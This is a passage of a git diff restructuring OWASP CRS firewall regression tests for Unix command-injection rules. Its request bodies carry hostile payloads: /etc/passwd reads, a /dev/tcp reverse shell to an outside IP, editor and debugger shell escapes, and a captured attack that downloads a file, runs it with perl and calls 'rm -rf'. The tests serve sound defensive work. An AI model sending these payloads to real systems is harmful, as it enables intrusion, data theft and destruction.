text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%26w%20%28x" + version: HTTP/1.0 + output: + log_contains: id "932232" + - test_id: 4 desc: "/?arg=&aptitude" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%26aptitude" - version: HTTP/1.0 - output: - no_log_contains: id "932232" - - test_title: 932232-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%26aptitude" + version: HTTP/1.0 + output: + no_log_contains: id "932232" + - test_id: 5 desc: Remote Command Execution bypass with time stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+who" - version: HTTP/1.1 - output: - log_contains: "id \"932232\"" - - test_title: 932232-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+who" + version: HTTP/1.1 + output: + log_contains: "id \"932232\"" + - test_id: 6 desc: Remote Command Execution bypass with time negative test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner" - version: HTTP/1.1 - output: - no_log_contains: "id \"932232\"" - - test_title: 932232-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner" + version: HTTP/1.1 + output: + no_log_contains: "id \"932232\"" + - test_id: 7 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ti''me+who" - version: HTTP/1.1 - output: - log_contains: "id \"932232\"" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=ti''me+who" + version: HTTP/1.1 + output: + log_contains: "id \"932232\"" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml index ed96bb847..e48735f53 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml @@ -2,685 +2,646 @@ meta: author: "Max Leske, Esad Cetiner, Xhoenix, Franziska Bühler, azurit" description: Unix shell RCE wordlist for more than 3 characters - enabled: true - name: 932235.yaml +rule_id: 932235 tests: - - test_title: 932235-1 + - test_id: 1 desc: "4JOGUXYQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;find /etc -name passwd -exec cat {} + - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;find /etc -name passwd -exec cat {} + + version: HTTP/1.0 + output: + log_contains: id "932235" + - test_id: 2 desc: "5Y3V6UZT" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=cd /;cd etc;column passwd - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=cd /;cd etc;column passwd + version: HTTP/1.0 + output: + log_contains: id "932235" + - test_id: 3 desc: "6BIVX1QB" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=cd /;cd etc;bridge -b passwd - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=cd /;cd etc;bridge -b passwd + version: HTTP/1.0 + output: + log_contains: id "932235" + - test_id: 4 desc: "7JRJIWP8" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=cd /;cd etc;fold passwd - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=cd /;cd etc;fold passwd + version: HTTP/1.0 + output: + log_contains: id "932235" + - test_id: 5 desc: "ANQ9SN3S" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;flock -u / whoami - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;flock -u / whoami + version: HTTP/1.0 + output: + log_contains: id "932235" + - test_id: 6 desc: "AVI5619I" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;cd /;cd etc;base32 passwd|base32 -d - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;cd /;cd etc;base32 passwd|base32 -d + version: HTTP/1.0 + output: + log_contains: id "932235" + - test_id: 7 desc: "P6E0KY27" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;cpulimit -l 100 -f whoami - output: - log_contains: id "932235" - - test_title: 932235-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=;cpulimit -l 100 -f whoami + output: + log_contains: id "932235" + - test_id: 8 desc: "PDDUY935" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - cd /;cd etc;comm passwd passwd - output: - log_contains: id "932235" - - test_title: 932235-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + cd /;cd etc;comm passwd passwd + output: + log_contains: id "932235" + - test_id: 9 desc: "PDDUY935 - but uppercase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - CD /;CD ETC;COMM PASSWD PASSWD - output: - log_contains: id "932235" - - test_title: 932235-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + CD /;CD ETC;COMM PASSWD PASSWD + output: + log_contains: id "932235" + - test_id: 10 desc: "FP with word comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=comment" - version: HTTP/1.0 - output: - no_log_contains: id "932235" - - test_title: 932235-11 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=comment" + version: HTTP/1.0 + output: + no_log_contains: id "932235" + - test_id: 11 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=;performance" - version: HTTP/1.0 - output: - no_log_contains: id "932235" - - test_title: 932235-12 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=;performance" + version: HTTP/1.0 + output: + no_log_contains: id "932235" + - test_id: 12 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=;perf --version" - version: HTTP/1.1 - output: - log_contains: id "932235" - - test_title: 932235-13 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=;perf --version" + version: HTTP/1.1 + output: + log_contains: id "932235" + - test_id: 13 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;`cat<<$d/tcp/51.15.142.164/777" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 4 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,id . - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,id . + version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 5 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,curl\ google.com . - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,curl\ google.com . + version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 6 desc: "9323HNQU - should not be detected at PL 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vi dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 7 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vim dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 8 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 9 desc: "9323HNQU - should not be detected at PL 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi -c:\!pwd - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vi -c:\!pwd + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 10 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vim -c:\!pwd - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim -c:\!pwd + version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 11 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex -c:\!pwd - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex -c:\!pwd + version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 12 desc: "ATFHUJVF" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;gdb -nx -ex \!whoami -ex quit - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;gdb -nx -ex \!whoami -ex quit + version: HTTP/1.0 + output: + log_contains: id "932236" + - test_id: 13 desc: "JW2SU88A" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;cat /path/file.gz - output: - log_contains: id "932236" - - test_title: 932236-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=;cat /path/file.gz + output: + log_contains: id "932236" + - test_id: 14 desc: "4JOGUXYQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - find /etc -name passwd -exec cat {} + - output: - log_contains: id "932236" - - test_title: 932236-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + find /etc -name passwd -exec cat {} + + output: + log_contains: id "932236" + - test_id: 15 desc: "ANQ9SN3S" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=flock -u / whoami - output: - log_contains: id "932236" - - test_title: 932236-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=flock -u / whoami + output: + log_contains: id "932236" + - test_id: 16 desc: "JW2SU88A" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cat /path/file.gz - output: - log_contains: id "932236" - - test_title: 932236-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=cat /path/file.gz + output: + log_contains: id "932236" + - test_id: 17 desc: "P6E0KY27" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cpulimit -l 100 -f whoami - output: - log_contains: id "932236" - - test_title: 932236-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=cpulimit -l 100 -f whoami + output: + log_contains: id "932236" + - test_id: 18 desc: "FP agains 'fi' without word boundary" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?field_metatags[0][advanced][rights]=somevalue" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?field_metatags[0][advanced][rights]=somevalue" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 19 desc: "FP MailerUI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=MailerUI" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-20 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=MailerUI" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 20 desc: "FP tasksListView" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=tasksListView" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=tasksListView" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 21 desc: System Command Injection (932236) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: 